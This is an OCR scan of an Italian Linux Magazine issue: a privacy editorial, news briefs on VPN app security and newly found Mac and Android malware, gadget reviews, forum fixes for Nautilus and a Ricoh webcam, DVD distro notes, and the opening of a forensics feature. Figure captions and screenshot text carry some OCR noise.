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Privacy ai tempi di Internet: solo un'utopia? 


Sul Web siamo tutti spiati. Quante volte 
abbiamo detto o ci siamo sentiti dire 
questa frase? Beh, a dirla tutte, più e 
più volte è stata riportata anche sulle 
pagine di questa rivista. D'altronde, è 

la verità. Ogni piccola mossa effettuata 
sul Web lascia una traccia che il più 
delle volte è del tutto indelebile. E ciò 
accade sui fronti più disparati. Basta 

ad esempio effettuare la ricerca di un 
preciso prodotto e, tutto d'un tratto, 
ogni contenuto pubblicitario visualizzato 
su questo o quel sito sembra proporci 
proprio il prodotto di cui necessitiamo. 
Ci abbiamo mai fatto caso? Questo è 
merito (se così possiamo definirlo) delle 
centinaia di cookies che collezioniamo 
quotidianamente. Per non parlare poi 

di quanto i social network influiscano 
negativamente sulla nostra vita privata. 
Pensiamo di fare un salto su Facebook 
(solo per citare il più famoso) per “fic- 
care il naso” nella vita dei nostri amici 

o conoscenti senza sapere, però, che è 
proprio il social network dal logo blu a 
ficcarlo nella nostra. Fermiamoci un at- 
timo e pensiamo a quante informazioni 
personali sono memorizzate nei server 
di un social network. E poi ci sono fo- 
rum, blog che visitiamo costantemente, 
server mail, cloud storage e chi più ne 
ha più ne metta. Ma pensiamo davvero 
che si tratti unicamente di sfaccettature 
negative del Web e, più in generale, 
dell'informatica? Proviamo a pensare un 
po' a quanti attacchi terroristici vengono 
giorno dopo giorno bloccati sul nascere. 
È tristemente noto a tutti noi, infatti, 

che quel male di nome ISIS comuni- 

ca costantemente con le sue cellule 
sparse in giro per l'Europa utilizzando, 
per forza di cose, la rete Internet. E, per 
quanto Tor o sistemi di messaggistica 
cifrati possano aiutare (indirettamente, 
sia chiaro) anche chi vuol far del male, 
spesso tutte queste precauzioni si 
rivelano (fortunatamente) del tutto inutili. 
Peri veri professionisti della sicurezza 
informatica accedere da remoto ad uno 
smartphone di un “indiziato” può essere 


Un gioco da ragazzi. E, a dirla tutta, 
dovremmo ringraziare quotidianamente 
coloro i quali vengono pagati dai gover- 
ni di tutto il mondo proprio per effettuare 
indagini informatiche. Certo, almeno 

nel caso in cui i governi in questione lo 
facciano ai fini di tutelare l'incolumità 
del popolo: scoprire di tutto sulla vita 
privata di un onesto cittadino violerebbe 
qualsiasi norma sui diritti dell'uomo. 

Ed il problema, forse, nasce proprio 

qui: c'è una linea, decisamente sottile, 
che separa la giustizia dall'ingiustizia, il 
diritto/dovere dall'abuso e, talune volte, 
cadere in errore è davvero semplice. 

Da un lato, scandagliare continuamen- 
te milioni (se non miliardi) di internauti 
potrebbe portare ad un'individuazione 
più semplice di eventuali malviventi, 

ma dall'altro non è neppure corretto nei 
confronti di chi sul Web accede per sfo- 
gliare un quotidiano on-line, controllare 
la posta elettronica, chattare con amici 
o lavorare. Ed i recenti e ripetuti scandali 
relativi, ad esempio, all'NSA (National 
Security Agency) a stelle e strisce sono 
solo uno di decine di esempi. E allora, 
come fare? C'è una soluzione definitiva 
che può essere adottata per garantire la 
sicurezza mondiale e al tempo stesso la 
privacy di tutti gli utenti? Se rispondere 
a questa domanda fosse stato così 
semplice e banale, molto probabilmente 
qualche provvedimento si sarebbe già 
preso. Per ora, ci basti sapere che, se 
non abbiamo scheletri nell'armadio, non 
ci ritroveremo di certo di fronte a brutte 
gatte da pelare. E, magari adottando 
qualche piccola contro misura (ad 
esempio utilizzando distro del calibro di 
Tails che ci consente di navigare in ma- 
niera anonima e senza lasciare tracce 
non solo sul Web ma anche su hard disk 
o SSD), la nostra privacy non dovrebbe 
essere messa in discussione. Ma il con- 
dizionale è pur sempre d'obbligo. 


Vincenzo Cosentino 
Invia iltuo commento a: 
redazione@linux-magazine.it 


Flash 


Facebook 
e AI sulle foto 


L'intelligenza artificiale 

di Facebook raggiunge 
un importante obiettivo 
nel campo del ricono- 
scimento del contenuto 
delle immagini: a capo 
della ricerca in mate 

ria di machine learning 
dell’azienda di Menlo 
Park, Joaquin Candela ha 
condiviso sul suo blog un 
post dettagliato su come 
Facebook, nelle foto di 
post condivisi, sia ora 

in grado di riconoscere, 
oltre agli oggetti, anche 
scene e azioni senza che 
sia necessario che sia 
presente alcun commento 
o tag. Ciò che consente 
di analizzare il contenuto 
di un'immagine è Lumos 
nato inizialmente per 
migliorare l’esperienza vi- 
siva per utenti ipovedenti 
e di cui già qualcosa era 
trapelato 

Lumos viene utilizzato 
per individuare e con- 
trassegnare materiale 
offensivo o nella lotta allo 
spam. Facebook lo ha 
“addestrato” su decine di 
milioni di foto sfruttando 
il fatto di essere avvan- 
taggiata in questo senso 
poiché la sua piattafor- 
ma ospita già miliardi di 
immagini con didascalia 
II modello, essenzialmen 
te, abbina descrittori di 
ricerca a caratteristiche 
estratte dalle foto con un 
certo grado di probabili- 
ta. Facebook è convinta 
che la nuova tecnologia 
migliorerà l’esperien- 

za degli utenti poiché 
sarà possibile effettuare 
ricerche delle foto sulla 
base dei contenuti e non 
solo di data, luogo o tag 
inserito. 
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Android e VPN: tutte le app sono insicure? 


Uno nuovo studio mette alla berlina la presunta sicurezza delle app VPN 


Un team di ricerca interna- 
zionale ha pubblicato un'analisi 
comparata di circa 300 app An- 
droid pensate per l'accesso su 
reti VPN (Virtual Private Net- 
work), un'offerta utilizzata da 
centinaia di milioni di utenti sen- 
za però la piena consapevolezza 
dei rischi a cui vanno incontro. 
Quelle app sono insicure, nella 
migliore delle ipotesi, e di servi- 
zi validi ce ne sono davvero po- 
chissimi. Anzi uno. | ricercatori 
australiani e statunitensi che 
hanno partecipato allo studio 
hanno messo sotto torchio 283 
app per l'accesso su VPN, ana- 
lizzandone il codice sorgente e 
il comportamento pratico nella 
gestione del traffico di rete dei 
tool basati sull'uso della tecno- 
logia BIND_VPN_SERVICE. 

Le succitate app sono in grado di 
intercettare il traffico telemati- 


co in arrivo e in un uscita su un 
terminale Android, e secondo i 
ricercatori si tratta di “privilegi” 
che vengono sostanzialmente 
sprecati a causa della mancata 
cifratura dei dati (18% delle app 
testate], l'introduzione di codice 
JavaScript potenzialmente pe- 
ricoloso per tenere sotto con- 
trollo le abitudini di navigazione 
dell'utente o visualizzare pubbli- 
cità, il leaking di traffico su pro- 
tocollo IPv6 (84%), la presenza 
di codice identificato come ma- 


levolo (38%) e altro ancora. Le 
app VPN su mobile sono quindi 
tutte da buttare? Quasi: secondo 
lo studio, uno dei pochi servizi 
che sembrano mantenere quel 
che promettono è Freedome 
VPN, app sviluppata dalla storica 
società di sicurezza finlandese 
F-Secure che però richiede il pa- 
gamento di una licenza annuale 
da 49,90 euro per l'utilizzo. 


Per informazioni: 
www.edmaster.it/url/6557 


Asus fa concorrenza al Raspberry Pi 


Il nuovo mini PC punta tutto sulle performance ad un prezzo contenuto 


MM Asus si mette in gioco sfidando uno dei pesi 
massimi delle nuove categorie: la nuova Tinker 
Board se la vedrà direttamente con Raspberry Pi, 
sfidandola con specifiche tecniche superiori e un 
prezzo che resta interessante. Su tutto, è il proces- 
sore montato che dovrebbe fare la differenza: un 
Rockchip RK3288 a 1.2 GHz anche se, va notato, si 
tratta di un SoC 32-bit contro i 64 di quello montato 
sulla Raspberry. Una scelta interessante fatta da 
Asus è quella di riprodurre praticamente in modo 


identico lo schema costruttivo di Raspberry: le 
porte di I/O sono distribuite nello stesso schema, 
così da semplificare anche la produzione di acces- 
sori analoghi a quelli già disponibili o addirittura 
riutilizzare gli stessi. Tutto il pacchetto della Tin- 
ker Board dovrebbe essere superiore, con 2 GB 
di RAM a bordo e capacità di pilotare un display 
4K con decodifica H.264 integrata, porta Ethernet 
Gigabit, possibilità di montare un'antenna Wi-Fi 
esterna e audio fino a 192K/24 bit. Un prodotto 
quindi con una seria vocazione multimediale. Asus 
ha pensato anche al software, sviluppando una 
versione personalizzata di Debian, anche se non 
manca il supporto dichiarato a 
Ubuntu, OpenSUSE e Kodi. 
Interessante il prezzo: 55 
sterline, poco meno di 65 
euro, contro i 40 euro cir- 
ca della concorrenza. 


Per informazioni: 
www.edmaster.it/url/6558 


Mozilla si rifà il look 


La Foundation ha brindato ad un nuovo logo. Addio al dinosauro 


MI Mozilla ha deciso di rivedere la sua imma- 
gine. E non si è limitata a farlo dando qualche 
spennellata di colore qua e là: è stato rivisto 
completamente il brand, dando priorità alla 
percezione da parte degli utenti. 

“Vogliamo che il marchio di Mozilla sia com- 
preso meglio da più persone. Vogliamo esse- 
re riconosciuti come i campioni di una Inter- 
net sana. Una Internet dove siamo tutti liberi 
di esplorare e scoprire e creare e innovare 
senza barriere o limitazioni. 

Dove il potere è nelle mani di molti, non de- 
tenuto da pochi. Una Internet in cui siano ri- 
spettati la nostra sicurezza, la sicurezza e 
l'identità” si legge nel blog della Fondazione. 
IL nuovo logo interiorizza il linguaggio di In- 
ternet, le lettere “i” ed “l” sono sostituite da 
due punti e doppio slash con un evidente ri- 
chiamo all'accesso immediato al Web. Anche 
il font utilizzato è un nuovo prodotto deno- 
minato Zilla ed è disponibile gratuitamente 
e può essere liberamente utilizzato in piena 


mozilla 


filosofia Open Source. Evoca il tipico font uti- 
lizzato sul Web ma avvicinandosi anche al ca- 
rattere giornalistico (il Courier in particola- 
re) rafforzando il concetto di partecipazione 
alla conversazione. 

La direzione seguita da Mozilla ha un respiro 
moderno e originale. Lo sforzo condotto ha 
già riscosso un certo successo presso la co- 
munità anche se qualche voce critica c'è. Per 
qualcuno il nuovo stile sarebbe un po' troppo 
“nerd” e avrebbe de-personalizzato il brand. 


Per informazioni: 
www.edmaster.it/url/6559 


Una backdoor datata 
per Mac e Linux 


Studiata per i sistemi Apple è “adattabile” 
anche sul Pinguino 


MI Gli esperti di 
sicurezza di Malwarebytes 
hanno annunciato la scoperta 


di 0SX.Backdoor.Quimitchin, 


malware con funzionalità 
da backdoor progettato per 
sfruttare chiamate di sistema 
a dir poco arcaiche - informa- 
ticamente parlando. Indivi- 
duato quasi per caso, il codi- 
ce malevolo potrebbe essere 
in circolazione - e quindi far 
danni - da un bel po' di anni. 
Per quanto riguarda le fun- 
zionalità operative del pay- 
load, Quimitchin si comporta 


da backdoor classica con 

la possibilità di catturare 

immagini dello schermo 
e di accedere alla webcam, 
controllare il sistema com- 
promesso da remoto ed ese- 
guire una mappatura della 
rete locale. Malwarebytes 
ha individuato la backdoor 
grazie all'allarme di un am- 
ministratore di sistema inso- 
spettito per la stranezza del 
traffico di rete in uscita, in un 
contesto che classifica il mal- 
ware come progettato per la 
compromissione di istituti e 
organizzazioni di ricerca bio- 
medica. Quimitchin sarebbe 
stato insomma utilizzato per 


attacchi estremamente spe- 
cifici, fatto che avrebbe quindi 
favorito la sua ‘invisibilità” 
rispetto ai radar delle società 
di sicurezza per tutto questo 
tempo. Da Malwarebytes ipo- 
tizzano infine la possibile esi- 
stenza di una variante della 
backdoor pensata per girare 
su GNU/Linux, considerato 
che il codice del malware fun- 
ziona perfettamente anche in 
questi contesti. Apple, che ha 
soprannominato il malware 
Fruitfly, ha già rilasciato una 
patch per OS OS X. 


Per informazioni: 


www.edmaster.it/url/6560 


Flash 


mil ransomware 
per Android 


l ricercatori di Check 
Point Software hanno 
individuato un nuovo 
malware per Android 
chiamato Charger, un 
ransomware camuffato 
all’interno di un’applica- 
zione apparentemente 
legittima e che ha infet- 
tato almeno un cliente 
dei prodotti di sicurez- 
za commercializzati 

dalla società. Charger è 
integrato come payload 
di EnergyRescue, app 
infetta e ora rimossa 

dal Play Store: una volta 
scaricata ed eseguita 
l’app, il malware ruba i 
contatti dell’utente peri 
messaggi testuali e chie- 
de l’accesso con i diritti 
di amministratore. È a 
questo punto che Char- 
ger mostra la sua vera 
natura, bloccando il gad- 
get infetto e imponendo il 
pagamento di un riscatto 
in Bitcoin per il ripristino 
del dispositivo. Dopo 
l'infezione, il ransomware 
si cura di ricordare alle 
vittime che tutti i loro 
dati sono stati copiati sui 
“server” controllati dai 
criminali, e che tali dati 
verranno messi in vendita 
sul mercato nero - inclusi 
eventuali account sui 
social network, conti 
bancari, carte di credito 
ecc. - qualora gli utenti 
non rispondessero pron- 
tamente alla richiesta di 
riscatto. Dal punto di vi- 
sta di Google la sicurezza 
dell’OS androide è miglio- 
rata parecchio: grazie al 
programma App Security 
Improvement (ASI) in due 
anni sono stati corretti i 
bug di sicurezza di oltre 
275.000 app. 


ce 
Linux Magazine s® 7 


Linux gadget e prodotti 


Periferiche, accessori e altri dispositivi per lavorare e divertirsi nel tempo libero 


“FATTI IL DRONE!” 


| quadricotteri sono ormai un must per gli amanti della tecnologia. 
E questa nuova soluzione firmata Parrot è molto interessante: 
solo 500 grammi di peso ed una videocamera integrata capace di 
registrare video in Full HD, Gli occhiami FPV, che ci permettono di 
vedere con gli occhi del drone, sono inclusi nel prezzo. E l'autono- 
mia? Nella media dei suoi concorrenti: 25 minuti di volo. 

Per informazioni: www.edmaster.it/url/6563 


PERFETTA PER IL RASPBERRY PI 


Siamo alla ricerca di una piccola tastiera da utilizzare sulla 
nostra SmartTV o per controllare il nostro Raspberry Pi 
magari trasformato in un perfetto media center? Questa è 
la soluzione che fa per noi. Integrato c'è anche un comodo 
trackpad molto utile per utilizzare le funzionalità di puntamen- 
to del mouse. Il funzionamento è garantito dal ricevitore USB 
wireless a 2.4 GHz. La disposizione della tastiera secondo lo 
standard QWERTY non ci fa sentire la mancanza del nostro 
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WI-FI ALLA MASSIMA POTENZA 


Dimensioni compatte, ben 4 antenne esterne e prestazioni da 
record: sono questi i punti di forza del router Tenda. Il tutto 
ad un prezzo estremamente concorrenziale. Tra i vari punti di 
forza, segnaliamo la tecnologia Beamforming che, in accop- 
piata all'amplificatore ad alta potenza, consente di migliorare 
la copertura e le prestazioni della rete senza fili. La velocità di 
trasferimento massima è pari a 1167 Mbps. 

Per informazioni: www.edmaster.it/url/6564 


DISEGNA IN 3D! 


Sarà come disegnare a mano libera, ma in realtà staremo creando 
una vera e propria opera d'arte in 3D. O per lo meno, se siamo mol- 
to bravi a disegnare! Si tratta della nuova versione della famosissi- 
ma 3Doodler, la penna 3D economica che ha conquistato il mondo 
intero. È capace di “stampare”, anzi disegnare, in ABS (Acrilonitrile- 
butadiene-stirene), PLA (Acido polilattico) e in Flexy (Poliuretano 
termoplastico). 

Per informazioni: www.edmaster.it/url/6566 


“MUSICA MAESTRO!" 
SPEAKER PORTATILE BLUETOOTH 

| Voglia di musica in portabilità? Uno speaker Bluetooth è per- 
. fetto! In pochi secondi può essere interfacciato con lo smar- 
| tphoneoiltablet Android così come con il notebook (purché 

quest'ultimo sia equipaggiato di un adattatore Bluetooth, 

ovviamente). La riproduzione può comunque avvenire anche 

tramite una scheda MicroSD inserita nell'apposito lettore in- 

tegrato. Inoltre, offre 

anche la funzione 

radio FM. di 

Per informazioni: Www. 

edmaster.it/url/6567 


IL CARICABATTERIE MAGICO! 


Se il nostro smartphone o tablet Android supporta la ricarica 
wireless, questo gadget può rivelarsi molto utile. Potremmo infatti 
dire addio al caricabatterie USB: basterà poggiare il telefonino su 
questa base circolare e, come per magia, il device incomicierà a 
caricarsi. Dalla forma elegante e con rifiniture metalliche è perfet- 
to per essere poggiato su ogni scrivania. Gli indicatori luminosi ci 
informano sullo stato della ricarica. 

Per informazioni: www.edmaster.it/url/6568 


“ANCH'IO STAMPO IN 3D" 


Se vogliamo entrare nel mondo della stampa 3D a testa alta, 
ma senza spendere una fortuna, questo kit potrebbe fare al 
caso nostro. Prima di iniziare a realizzare i nostri prototipi, 
però, impareremo come assemblare da zero una stampante 
83D: già, perché questo kit viene fornito non montato. Ma non 
c'è da temere: una video guida ci spiegherà come fare! Ad as- 
semblaggio terminato, ci basterà utilizzare il software fornito 
per GNU/Linux i - ; 

per iniziare a 

realizzare i nostri 

progetti. 


Per informazioni: 


IL RE DEI MOUSE 

LOGITECH 910-004362 MX 

Passiamo intere giornate al PC? Proteggiamo le nostre mani. Proprio 
per questo motivo è fondamentale utilizzare tastiere e mouse che 
non affatichino i nostri arti. E quando si parla di mouse, questo 
modello di Logitech è una delle migliori soluzioni che possiamo 
adottare. Estremamente ergonomico, offre due differenti scroller, 
uno da utilizzare con il pollice e un altro con l'indice. È wireless ed il 


suo raggio di azione è di ben 10 metri. 
Per informazioni: www.edmaster.it/url/6569 
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DAL FORUM 


WWW.LINUX-MAGAZINE.IT 


SOLUZIONI DAL FORUM 


Ogni mese i thread più gettonati estratti nelle diverse discussioni dal forum di GNU/Linux 
Magazine. Se non fate ancora parte della nostra squadra, iscrivetevi subito e contribuite 
alla crescita del movimento Open Source. Il nostro sito è pronto ad ospitare esperti, neofiti 
o semplicemente chi ne vuole sapere di più a proposito di GNU/Linux e del Software Libero 


Sistema/KDE, Gnome e gli altri 


IL FILE MANAGER NAUTILUS FA I CAPRICCI 


DOMANDA ®@ Buongiorno, riporto quanto mi è accaduto. Per errore ho 
caricato un PDF con Notepadqq (http:/notepadgq.altervista.org/s/) il noto 
editor (Fig. 1) simile a Notepad+- per ambienti Microsoft Windows. In 
seguito a questa azione si è presentato un problema con Nautilus (Fig. 2): 
quando provo ad avviarlo appare la finestra per un istante salvo poi scomparire 
subito dopo. 

Con utenti diversi funziona correttamente. Inutile disinstallarlo per poi 
procedere a nuova installazione, il problema permane. Se provo a lanciarlo da 
terminale mi viene restituito il seguente errore: 


(nautilus:11961): Gtk-WARNING **: Theme parsing error:} 
<broken file>:1:0: Failed to import: La risorsa presso “/Y 
org/gnome/libgd/tagged-entry/default.css” non esiste 
ERROR:nautilus-canvas-container.c:6021:finish adding new + 
icons: assertion failed: (!container>details>auto layout) 


Grazie a quanti vorranno rispondere. 


SOLUZIONE ® La domanda è posta dall’utente bruno.z e la soluzione viene 
trovata dopo un paio di post, pertanto analizziamo la possibile dinamica da 
poter seguire in questi casi. Il primo passo potrebbe essere la rimozione del 
software interessato, naturalmente se non si porta dietro, causa dipendenze, 
mezza installazione! Si potrebbe pensare di utilizzare il comando: 


Fide  Ecit Search View Encoding  Linguage Setting Run Window 7 
Pavia at 
HI Loratestcustomino & | 

1 + PInchuce <SPLH> I 

) byte valore; 

‘ inte; 

vos setup) 

"i 

Imposta pan par i Chip Serect CS) 0 Slave Detect (55) 
OUTPUTI: 

GagaBWtrte( 2 HIOH): 
) arczioneza @ bus SP 
SPLbegh): 
Prima i bit più signaicasvo 


1 Divide per 8 a frequonza di cigck del processore 
SPI, 


17‘) // Imposta la modalità SPÎ supportata dai modulo LoRia 
> | $PLaetOataModo(SPL_MODEO): 


9 Y Apre la porta seriale ad una velocità ci 9600 Baud 
Sarial begin(9600): 


Fig. 1 e Notepadqgq: l'editor sviluppato da programmatori 
per i programmatori 
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Fig. 2 * Nautilus, il file manager dell'ambiente del “piedone” 


apt-get remove nomepacchetto 


il quale rimuoverà i binari, ma non i file di configurazione o i dati del 
software che si vuole disinstallare, così come non verranno toccate neanche 
le dipendenze. In genere, quando un software fa i capricci è o perché si è fatta 
confusione con il file di configurazione o in seguito ad una corruzione dello 
stesso. In base a questo scenario sarebbe allora più opportuno impartire il 
comando: 


apt-get remove --purge nomepacchetto 


che rimuoverà qualsiasi cosa che riguardi il software nomepacchetto — ad 
esclusione delle dipendenze installate durante la sua installazione - compresi 
eventuali file di configurazione. Questo comando è particolarmente utile per 
azzerare una situazione nella quale si è pasticciato con i file di configurazione. 
Ma nel caso dell’utente brun0.z nemmeno questo comando si è rivelato 
sufficiente, perché? L'opzione —purge rimuove si i file di configurazione, 
ma questi non riguardano i pacchetti che presentano i file di configurazione 
anche nella home utente. Così, se per esempio si dovesse rimuovere Firefox, 
XBMC o qualsiasi altro software che scrive e presenti file di configurazione 
all’interno della cartella /home/nome_utente, questi file resteranno lì al 
loro posto e in una successiva installazione verranno presi di nuovo come 
riferimento per la configurazione dell’utente che lancia il programma. Come 
procedere? Per Nautilus, nella home utente che lancia il programma, si 
possono trovare fino due file e di preciso: 


- /home/nome utente/.config/nautilus 
- /home/nome utente/.local/share/nautilus 


Le cartelle (o i file) che hanno il punto davanti sono cartelle/file 
nascoste, pertanto per visualizzarle occorre abilitare l’apposita voce 
nel file manager che si intende utilizzare: ad esempio in Nautilus 
la visualizzazione degli oggetti nascosti la si ottiene attraverso la 
scorciatoia Ctrl-H oppure optando per Mostra i file nascosti dal 
menù contestuale. Qualora si utilizzasse la shell occorre aggiungere 
l’opzione -a al comando ls (man Is). Detto ciò per risolvere il problema 
rimuoviamo tutta la cartella azzerando così la configurazione per 
l’utente in questione (comando rm -Rf /percorso/cartella/nautilus). 
Effettuata questa operazione è possibile rilanciare Nautilus con l’utente 
incriminato: in questo modo è come se lo avviassimo per la prima 
volta e il file manager si andrà a creare automaticamente un nuovo 
file di configurazione predefinito nella home dell’utente che lo ha 
lanciato risolvendo, nello specifico, il problema dell’utente bruno.z. 
Per completezza di informazione riportiamo anche un’altra opzione di 
apt-get (man -apt-get per approfondimenti), nello specifico: 


apt-get autoremove 


il quale rimuove i pacchetti orfani, ovvero pacchetti installati a causa 
dell’installazione di un pacchetto che le richiedeva ma che ora non sono 
più necessari poiché è venuta meno la loro dipendenza. 


Sistema/Hardware 


WEBCAM INTEGRATA RICOH 


SOLUZIONE @ Quanto riportato di seguito non è una domanda, ma 
piuttosto una procedura che l’utente Sargon6 ha riportato nel forum al 
fine di far funzionare la webcam Ricoh che equipaggia il suo portatile 
Sony VAIO VGN-FE41M (Fig. 3). 

La webcam, dall’output del comando Isusb (man Isusb), ha Vendor ID 
e Product ID pari a 05ca:1836: 


opensuse42x2@linux-kny8:-> lsusb | grep -i camera 
Bus 005 Device 003: ID 05ca:1836 Ricoh Co., Ltd Visual 
, 

Communication Camera VGP-VCC4 [R5U870] 


La procedura, relativa ad una OpenSUSE 42.2 a 64 bit, è riportata di 
seguito per passi affinché sia facilmente consultabile. 


1 - All’indirizzo riportato di seguito si scarichi il pacchetto r5u87x- 
firmware-0.2.1-13.2.noarch.rpm: 


https://software.opensuse.org/package/r5u87x-firmware?search_ 
term=r5u87x-firmware 


2 - Come il punto precedente scaricando il pacchetto r5u87x-0.2.1- 
13.2.x86_64.rpm da 


http://download.opensuse.org/repositories/home:/enzokiel/ 
openSUSE _42.1_Update/ 
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Fig. 3 
* Il portatile 

con la webcam 
Ricoh con chipset R5U870 


3 - Tramite il gestore dei file, entrare nel percorso dove sono scaricati 
i due file e procedere alla loro installazione cliccando prima sul file 
r5u87x-firmware-0.2,1-13.2.noarch.rpm quindi su r5u87x-0.2.1- 
13.2.x86_64.rpm. 


AI riavvio la webcam Ricoh, con chipset R5SU870, integrata nel laptop 
Sony Vaio VGN-FE41M funzionerà perfettamente. A completamento di 
questa mini guida aggiungiamo alcune informazioni complementari. Prima 
di tutto osserviamo come vengano utilizzati repository (e pacchetti) di 
versioni precedenti della distribuzione. Questo non sempre è possibile e in 
particolar modo quando il software da installare non sia solo un caricatore 
microcode del firmware come in questo caso: infatti il software non installa 
alcun modulo, ma “solo” un certo numero di firmware e un loader. Qualora 
non fosse disponibili pacchetti per la distribuzione in uso e/o venissero 
restituiti degli errori durante la fase di installazione, possiamo divincolarci 
dai pacchetti precompilati ricorrendo direttamente ai sorgenti del progetto 
all’indirizzo Attps://bitbucket.org/ahixon/r5u87x/src. Dopo aver installato 
il pacchetto mercurial procediamo alla clonazione del repositorio dei 
sorgenti con il comando hg clone https://bitbucket.org/ahixon/r5u87x. 
Prima di passare alla compilazione assicuriamoci di aver installato i 
pacchetti glib2.0-devel, libusb-devel, il compilatore gec e automake. 
Fatto ciò entriamo nella cartella dei sorgenti dianzi clonati (comando 
cd r5u87x) quindi impartiamo il comando make. Se la compilazione 
non produce errori passiamo all’installazione utilizzando, con i diritti di 
amministratore, il comando make install il quale provvederà a installare 
i firmware in /lib/firmware nonché la regola udev in /etc/udev/rules.d/ 
per il caricamento automatico all’avvio del modulo del kernel uvevideo 
(modinfo uvevideo) e relativo firmware necessario. Abbiamo scritto di 
firmware al plurale poiché le webcam supportate sono diverse e tutte 
elencate nel file model_matrix.txt presente in r5u87/r5u87x/docs/. Due 
osservazioni per terminare. Ricordiamo che il firmware è una porzione di 
codice che viene caricato nella flash dell’hardware che si vuole utilizzare 
dal modulo del kernel che lo supporta. Infine, la procedura da'sorgenti vale 
per qualsiasi distribuzione: oltre che su una OpenSUSE 42.2 l’abbiamo 
provata anche su una Fedora 25 e una Slackware 14.2 senza riscontrare 
alcun problema. 
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Distribuzioni 


DEFT “ZERO” 


d 
a distro tricolore più amate dai professionisti della sicurezza (0 
meglio, dell'informatica forense) si aggiorna. E lo fa con una 
nuova release “Zero” decisamente più snella, ma solo in termini di 
peso. Già, perché tutti i tool fondamentali per analizzare un disco 
rigido o una generica memoria non mancano: dopotutto, DEFT nasce 
proprio con questo scopo. Rispetto ad una “classica” release di DEFT, 
la versione Zero si distingue proprio per compattezza ed è partico- 
larmente indicata per essere avviata su quelle macchine non proprio 


English | 
Espaîiol 
Italiano 


COME UTILIZZARE IL DVD-ROM 


Le distribuzioni principali presenti all'interno del DVD-Rom sono direttamente avviabili dal supporto digitale, quindi installabili o 
eseguibili in modalità LIVE. Basta inserire il DVD-Rom nell'apposito lettore e riavviare il PC. Dopo pochi secondi apparirà l'inter- 
faccia per l'avvio della distribuzione o per la sua esecuzione in modalità LIVE. Per tutte le altre basta seguire le seguenti istruzioni. 


UCECELELRE 


L'INTERFACCIA 


Per le distribuzioni disponibili sotto forma di immagini ISO, apriamo il 
DVD-Rom con il file manager e clicchiamo due vole sul file index.htm. 
A questo punto, dovrebbe apparire l'interfaccia di gestione. Clicchiamo 
sull'illustrazione o sulla voce Distribuzioni presente nel menu a destra. 
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all'ultimo grido: è basata su Lubuntu 14.04.02 LTS. Oltre ad essere 
incredibilmente scattante è anche semplice da usare: ogni tool è al 
giusto menu e, almeno per gli usi più semplici (ad esempio l’analisi di 
una pendrive), è davvero alla portata di tutti. Fra le novità più rilevanti, 
troviamo il supporto alle memorie NVMExpress ed eMMC. Se voglia- 
mo scoprire come usare al meglio DEFT Zero, non ci resta che immer- 
gerci nella Cover Story di questo numero di Linux Magazine (pag. 14) 
che abbiamo deciso di dedicare proprio alle indagini informatiche. 


fila:///media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Indice di /media/backup/Distribuzioni/dvd-10-149-b/distribuzioni/ 


Dimensioni —Data ultima modifica 


directory principale 
2043 26/08/13 12:23:57 


2608/13 12:30:01 


DOWNLOAD ISO 


Da qui, possiamo scaricare l'immagine ISO della distribuzione semplicemente 
accedendo alla sua eventuale cartella e premendo sul relativo link. Dopodiché, 
possiamo masterizzare l'ISO su Cd-Rom e DVD-Rom per creare il supporto di 
installazione o trasferirla su una pendrive USB bootable. 
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LINUX MINT 18.1 KDE 


E arrivare una nuova “variante” di Linux Mint 18.1, per gli 
amici “Serena” (continua infatti la tradizione di battezzare le 
nuove release di Mint con nomi femminili). Questa volta saranno 
contenti gli amanti dell'ambiente desktop KDE. Per chi ancora non 
lo sapesse, Linux Mint è la distro che da qualche anno sta tenendo 
sotto scacco persino Ubuntu: sempre più utenti, infatti, decidono 
di affidarsi a Mint per “evitare” l’ambiente desktop Unity di casaa 
Canonical. E con Mint si va sul sicuro: basata su Ubuntu (ma solo 


Creare un nuovo progetto: Progetti recenti: 


\ Progetto audio Im-138.iso 


_Ald crea unco audio tradizionale Mageia-2-:586-DVD.iso 
KNOPPIX_V7.0.1DVD-2012-05-24-EN 

Progetto dati 
\ 


=| Crea unCD o DVD di dati 


Im-137-b.iso 


linuxmint-13-mate-dvd-32bit.iso 


Progetto video 
Crea un DVD video o un SVCD 


) Copia disco 
0) 
è Mg } Crea una ae 1:1 di un CD/DvD 


A, Masterizza immagine 
Y*/ Masterizza un'immagine CD/DVD esistente su disco 


MASTERIZZAZIONE SUPPORTI 


In ambiente Gnome possiamo utilizzare Brasero, su KDE K3b. Nel primo 
caso, avviamo il software, clicchiamo su Masterizza immagine e selezio- 
niamo l'ISO da masterizzare. Con K3b, invece, clicchiamo su Strumenti/ 
Masterizza immagine ISO e selezioniamo l'immagine ISO. 


e 


release LTS - Long Term Support) e altamente personalizzabile. 
Cosa c'è di nuovo in questa edizione KDE? Gli sviluppatori del 
progetto hanno lavorato all'aggiunta delle X-Apps, ovvero partico- 
lari applicazioni appositamente studiate per mantenere lo stesso 
aspetto e funzionalità anche se l’ambiente desktop utilizzato è 
differente. Aggiornato anche il gestore degli aggiornamenti che 
consente di vedere in maniera ancor più immediata gli eventuali 
aggiornamenti disponili per il kernel. 


Level Upgrade Package 


xttprc 
nre 


x] UNetbootin 


{ Distribution [= Select Distribution == “i [== Select Version 


Benvenuti in UNetbootin, il Netboot Installer universale. Uso: 


1. Selezionare dalla lista qui sopra una distribuzione ed una version 
specificare manualmente i file da caricare qui sotto. 
2. Selezionare un tipo di installazione e fare clic su OK per iniziarla. 


TT Show All Drives (Use with Care) 


Type: [prive use mel Drive: 
PENDRIVE USB AVVIABILE 


Installiamo UNetbootin (ttp:/unetbootin.sourceforge.nefì. Colleghia- 
mo la pendrive USB al PC, selezioniamo Diskimage e premiamo su “... 
per trovare l’ISO. A questo punto, clicchiamo su OK e aspettiamo che la 
procedura termini. Subito dopo avviamo il PC da periferica USB. 


eo 
cere 


® 
22 13 


cose 
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Distro e tecniche dei Security Admin per analizzare a fondo PC, smartphone 
e pendrive alla ricerca di file criptati, foto cancellate ed e- mail compromettenti 


gini si svolgono con l’ausilio di PC e smartphone. Molti 

malviventi non soltanto usano i computer per perpetrare 
le loro truffe, ma anche per memorizzare informazioni importanti 
a tale riguardo, come documenti dei loro profitti e dettagli rela- 
tivi alle vittime. Le forze dell’ordine hanno quindi la necessità 
di analizzare questi dispositivi, non solo per scoprire il metodo 
operativo del truffatore, ma anche per poter dimostrare che la 
persona sia davvero un truffatore e permettere così ai magistrati 
l'assegnazione della pena. Questo tipo di attività degli inqui- 
renti è chiamato computer forensic, o informatica forense. 
